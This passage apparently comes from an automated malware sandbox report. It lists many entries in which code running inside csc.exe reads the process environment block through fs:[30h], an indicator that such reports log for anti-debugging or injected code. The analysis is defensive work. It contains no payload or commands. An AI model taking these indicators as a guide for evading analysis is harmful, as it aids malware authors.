            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053A2582 mov eax, dword ptr fs:[00000030h]14_2_053A2582
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053A2582 mov ecx, dword ptr fs:[00000030h]14_2_053A2582
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053C15F4 mov eax, dword ptr fs:[00000030h]14_2_053C15F4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053C15F4 mov eax, dword ptr fs:[00000030h]14_2_053C15F4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053C15F4 mov eax, dword ptr fs:[00000030h]14_2_053C15F4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053C15F4 mov eax, dword ptr fs:[00000030h]14_2_053C15F4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053C15F4 mov eax, dword ptr fs:[00000030h]14_2_053C15F4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053C15F4 mov eax, dword ptr fs:[00000030h]14_2_053C15F4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053DC5ED mov eax, dword ptr fs:[00000030h]14_2_053DC5ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053DC5ED mov eax, dword ptr fs:[00000030h]14_2_053DC5ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0542B594 mov eax, dword ptr fs:[00000030h]14_2_0542B594
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0542B594 mov eax, dword ptr fs:[00000030h]14_2_0542B594
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053A25E0 mov eax, dword ptr fs:[00000030h]14_2_053A25E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053CE5E7 mov eax, dword ptr fs:[00000030h]14_2_053CE5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053CE5E7 mov eax, dword ptr fs:[00000030h]14_2_053CE5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053CE5E7 mov eax, dword ptr fs:[00000030h]14_2_053CE5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053CE5E7 mov eax, dword ptr fs:[00000030h]14_2_053CE5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053CE5E7 mov eax, dword ptr fs:[00000030h]14_2_053CE5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053CE5E7 mov eax, dword ptr fs:[00000030h]14_2_053CE5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053CE5E7 mov eax, dword ptr fs:[00000030h]14_2_053CE5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053CE5E7 mov eax, dword ptr fs:[00000030h]14_2_053CE5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_054205A7 mov eax, dword ptr fs:[00000030h]14_2_054205A7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_054205A7 mov eax, dword ptr fs:[00000030h]14_2_054205A7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_054205A7 mov eax, dword ptr fs:[00000030h]14_2_054205A7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053C95DA mov eax, dword ptr fs:[00000030h]14_2_053C95DA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053A65D0 mov eax, dword ptr fs:[00000030h]14_2_053A65D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053DA5D0 mov eax, dword ptr fs:[00000030h]14_2_053DA5D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053DA5D0 mov eax, dword ptr fs:[00000030h]14_2_053DA5D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053DE5CF mov eax, dword ptr fs:[00000030h]14_2_053DE5CF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053DE5CF mov eax, dword ptr fs:[00000030h]14_2_053DE5CF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_054335BA mov eax, dword ptr fs:[00000030h]14_2_054335BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_054335BA mov eax, dword ptr fs:[00000030h]14_2_054335BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_054335BA mov eax, dword ptr fs:[00000030h]14_2_054335BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_054335BA mov eax, dword ptr fs:[00000030h]14_2_054335BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0545F5BE mov eax, dword ptr fs:[00000030h]14_2_0545F5BE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053D55C0 mov eax, dword ptr fs:[00000030h]14_2_053D55C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053DA430 mov eax, dword ptr fs:[00000030h]14_2_053DA430
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0545F453 mov eax, dword ptr fs:[00000030h]14_2_0545F453
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0539E420 mov eax, dword ptr fs:[00000030h]14_2_0539E420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0539E420 mov eax, dword ptr fs:[00000030h]14_2_0539E420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0539E420 mov eax, dword ptr fs:[00000030h]14_2_0539E420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0539C427 mov eax, dword ptr fs:[00000030h]14_2_0539C427
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053C340D mov eax, dword ptr fs:[00000030h]14_2_053C340D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0547547F mov eax, dword ptr fs:[00000030h]14_2_0547547F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053D8402 mov eax, dword ptr fs:[00000030h]14_2_053D8402
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053D8402 mov eax, dword ptr fs:[00000030h]14_2_053D8402
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053D8402 mov eax, dword ptr fs:[00000030h]14_2_053D8402
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053CA470 mov eax, dword ptr fs:[00000030h]14_2_053CA470
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053CA470 mov eax, dword ptr fs:[00000030h]14_2_053CA470
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053CA470 mov eax, dword ptr fs:[00000030h]14_2_053CA470
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053A1460 mov eax, dword ptr fs:[00000030h]14_2_053A1460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053A1460 mov eax, dword ptr fs:[00000030h]14_2_053A1460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053A1460 mov eax, dword ptr fs:[00000030h]14_2_053A1460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053A1460 mov eax, dword ptr fs:[00000030h]14_2_053A1460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053A1460 mov eax, dword ptr fs:[00000030h]14_2_053A1460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053BF460 mov eax, dword ptr fs:[00000030h]14_2_053BF460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053BF460 mov eax, dword ptr fs:[00000030h]14_2_053BF460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053BF460 mov eax, dword ptr fs:[00000030h]14_2_053BF460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053BF460 mov eax, dword ptr fs:[00000030h]14_2_053BF460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053BF460 mov eax, dword ptr fs:[00000030h]14_2_053BF460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053BF460 mov eax, dword ptr fs:[00000030h]14_2_053BF460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0539645D mov eax, dword ptr fs:[00000030h]14_2_0539645D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053C245A mov eax, dword ptr fs:[00000030h]14_2_053C245A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053AB440 mov eax, dword ptr fs:[00000030h]14_2_053AB440
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053AB440 mov eax, dword ptr fs:[00000030h]14_2_053AB440
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053AB440 mov eax, dword ptr fs:[00000030h]14_2_053AB440
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053AB440 mov eax, dword ptr fs:[00000030h]14_2_053AB440
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053AB440 mov eax, dword ptr fs:[00000030h]14_2_053AB440
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053AB440 mov eax, dword ptr fs:[00000030h]14_2_053AB440
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053DE443 mov eax, dword ptr fs:[00000030h]14_2_053DE443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053DE443 mov eax, dword ptr fs:[00000030h]14_2_053DE443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053DE443 mov eax, dword ptr fs:[00000030h]14_2_053DE443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053DE443 mov eax, dword ptr fs:[00000030h]14_2_053DE443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053DE443 mov eax, dword ptr fs:[00000030h]14_2_053DE443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053DE443 mov eax, dword ptr fs:[00000030h]14_2_053DE443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053DE443 mov eax, dword ptr fs:[00000030h]14_2_053DE443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053DE443 mov eax, dword ptr fs:[00000030h]14_2_053DE443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053D34B0 mov eax, dword ptr fs:[00000030h]14_2_053D34B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053D44B0 mov ecx, dword ptr fs:[00000030h]14_2_053D44B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053A64AB mov eax, dword ptr fs:[00000030h]14_2_053A64AB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_054754DB mov eax, dword ptr fs:[00000030h]14_2_054754DB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_054494E0 mov eax, dword ptr fs:[00000030h]14_2_054494E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0539B480 mov eax, dword ptr fs:[00000030h]14_2_0539B480
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053A9486 mov eax, dword ptr fs:[00000030h]14_2_053A9486
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053A9486 mov eax, dword ptr fs:[00000030h]14_2_053A9486
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053A04E5 mov ecx, dword ptr fs:[00000030h]14_2_053A04E5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0542A4B0 mov eax, dword ptr fs:[00000030h]14_2_0542A4B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053A973A mov eax, dword ptr fs:[00000030h]14_2_053A973A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053A973A mov eax, dword ptr fs:[00000030h]14_2_053A973A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053D273C mov eax, dword ptr fs:[00000030h]14_2_053D273C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053D273C mov ecx, dword ptr fs:[00000030h]14_2_053D273C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053D273C mov eax, dword ptr fs:[00000030h]14_2_053D273C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_05399730 mov eax, dword ptr fs:[00000030h]14_2_05399730
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_05399730 mov eax, dword ptr fs:[00000030h]14_2_05399730
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053D5734 mov eax, dword ptr fs:[00000030h]14_2_053D5734
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_05473749 mov eax, dword ptr fs:[00000030h]14_2_05473749
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_05424755 mov eax, dword ptr fs:[00000030h]14_2_05424755
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053A3720 mov eax, dword ptr fs:[00000030h]14_2_053A3720
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053BF720 mov eax, dword ptr fs:[00000030h]14_2_053BF720
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053BF720 mov eax, dword ptr fs:[00000030h]14_2_053BF720
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053BF720 mov eax, dword ptr fs:[00000030h]14_2_053BF720
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053DC720 mov eax, dword ptr fs:[00000030h]14_2_053DC720
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053DC720 mov eax, dword ptr fs:[00000030h]14_2_053DC720
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053DF71F mov eax, dword ptr fs:[00000030h]14_2_053DF71F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053DF71F mov eax, dword ptr fs:[00000030h]14_2_053DF71F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053A0710 mov eax, dword ptr fs:[00000030h]14_2_053A0710
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053D0710 mov eax, dword ptr fs:[00000030h]14_2_053D0710
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053A5702 mov eax, dword ptr fs:[00000030h]14_2_053A5702
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053A5702 mov eax, dword ptr fs:[00000030h]14_2_053A5702
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053A7703 mov eax, dword ptr fs:[00000030h]14_2_053A7703
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053DC700 mov eax, dword ptr fs:[00000030h]14_2_053DC700
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053A8770 mov eax, dword ptr fs:[00000030h]14_2_053A8770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053B0770 mov eax, dword ptr fs:[00000030h]14_2_053B0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053B0770 mov eax, dword ptr fs:[00000030h]14_2_053B0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053B0770 mov eax, dword ptr fs:[00000030h]14_2_053B0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053B0770 mov eax, dword ptr fs:[00000030h]14_2_053B0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053B0770 mov eax, dword ptr fs:[00000030h]14_2_053B0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053B0770 mov eax, dword ptr fs:[00000030h]14_2_053B0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053B0770 mov eax, dword ptr fs:[00000030h]14_2_053B0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053B0770 mov eax, dword ptr fs:[00000030h]14_2_053B0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053B0770 mov eax, dword ptr fs:[00000030h]14_2_053B0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053B0770 mov eax, dword ptr fs:[00000030h]14_2_053B0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053B0770 mov eax, dword ptr fs:[00000030h]14_2_053B0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053B0770 mov eax, dword ptr fs:[00000030h]14_2_053B0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0539B765 mov eax, dword ptr fs:[00000030h]14_2_0539B765
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0539B765 mov eax, dword ptr fs:[00000030h]14_2_0539B765
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0539B765 mov eax, dword ptr fs:[00000030h]14_2_0539B765
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0539B765 mov eax, dword ptr fs:[00000030h]14_2_0539B765
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053A0750 mov eax, dword ptr fs:[00000030h]14_2_053A0750
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0545F72E mov eax, dword ptr fs:[00000030h]14_2_0545F72E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0546972B mov eax, dword ptr fs:[00000030h]14_2_0546972B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053E2750 mov eax, dword ptr fs:[00000030h]14_2_053E2750
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053E2750 mov eax, dword ptr fs:[00000030h]14_2_053E2750
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053D674D mov esi, dword ptr fs:[00000030h]14_2_053D674D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053D674D mov eax, dword ptr fs:[00000030h]14_2_053D674D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053D674D mov eax, dword ptr fs:[00000030h]14_2_053D674D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0541C730 mov eax, dword ptr fs:[00000030h]14_2_0541C730
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053B3740 mov eax, dword ptr fs:[00000030h]14_2_053B3740
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053B3740 mov eax, dword ptr fs:[00000030h]14_2_053B3740
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053B3740 mov eax, dword ptr fs:[00000030h]14_2_053B3740
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0547B73C mov eax, dword ptr fs:[00000030h]14_2_0547B73C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0547B73C mov eax, dword ptr fs:[00000030h]14_2_0547B73C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0547B73C mov eax, dword ptr fs:[00000030h]14_2_0547B73C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0547B73C mov eax, dword ptr fs:[00000030h]14_2_0547B73C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_054207C3 mov eax, dword ptr fs:[00000030h]14_2_054207C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0539F7BA mov eax, dword ptr fs:[00000030h]14_2_0539F7BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0539F7BA mov eax, dword ptr fs:[00000030h]14_2_0539F7BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0539F7BA mov eax, dword ptr fs:[00000030h]14_2_0539F7BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0539F7BA mov eax, dword ptr fs:[00000030h]14_2_0539F7BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0539F7BA mov eax, dword ptr fs:[00000030h]14_2_0539F7BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0539F7BA mov eax, dword ptr fs:[00000030h]14_2_0539F7BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0539F7BA mov eax, dword ptr fs:[00000030h]14_2_0539F7BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0539F7BA mov eax, dword ptr fs:[00000030h]14_2_0539F7BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0539F7BA mov eax, dword ptr fs:[00000030h]14_2_0539F7BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053CD7B0 mov eax, dword ptr fs:[00000030h]14_2_053CD7B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053A07AF mov eax, dword ptr fs:[00000030h]14_2_053A07AF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053A47FB mov eax, dword ptr fs:[00000030h]14_2_053A47FB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053A47FB mov eax, dword ptr fs:[00000030h]14_2_053A47FB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0545F78A mov eax, dword ptr fs:[00000030h]14_2_0545F78A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053C27ED mov eax, dword ptr fs:[00000030h]14_2_053C27ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053C27ED mov eax, dword ptr fs:[00000030h]14_2_053C27ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053C27ED mov eax, dword ptr fs:[00000030h]14_2_053C27ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053AD7E0 mov ecx, dword ptr fs:[00000030h]14_2_053AD7E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_054297A9 mov eax, dword ptr fs:[00000030h]14_2_054297A9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0542F7AF mov eax, dword ptr fs:[00000030h]14_2_0542F7AF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0542F7AF mov eax, dword ptr fs:[00000030h]14_2_0542F7AF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0542F7AF mov eax, dword ptr fs:[00000030h]14_2_0542F7AF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0542F7AF mov eax, dword ptr fs:[00000030h]14_2_0542F7AF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0542F7AF mov eax, dword ptr fs:[00000030h]14_2_0542F7AF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_054737B6 mov eax, dword ptr fs:[00000030h]14_2_054737B6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053AC7C0 mov eax, dword ptr fs:[00000030h]14_2_053AC7C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053A57C0 mov eax, dword ptr fs:[00000030h]14_2_053A57C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053A57C0 mov eax, dword ptr fs:[00000030h]14_2_053A57C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053A57C0 mov eax, dword ptr fs:[00000030h]14_2_053A57C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053A262C mov eax, dword ptr fs:[00000030h]14_2_053A262C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053BE627 mov eax, dword ptr fs:[00000030h]14_2_053BE627
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053D6620 mov eax, dword ptr fs:[00000030h]14_2_053D6620
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053D8620 mov eax, dword ptr fs:[00000030h]14_2_053D8620
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0539F626 mov eax, dword ptr fs:[00000030h]14_2_0539F626
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0539F626 mov eax, dword ptr fs:[00000030h]14_2_0539F626
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0539F626 mov eax, dword ptr fs:[00000030h]14_2_0539F626
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0539F626 mov eax, dword ptr fs:[00000030h]14_2_0539F626
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0539F626 mov eax, dword ptr fs:[00000030h]14_2_0539F626
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0539F626 mov eax, dword ptr fs:[00000030h]14_2_0539F626
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0539F626 mov eax, dword ptr fs:[00000030h]14_2_0539F626
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0539F626 mov eax, dword ptr fs:[00000030h]14_2_0539F626
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0539F626 mov eax, dword ptr fs:[00000030h]14_2_0539F626
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053E2619 mov eax, dword ptr fs:[00000030h]14_2_053E2619
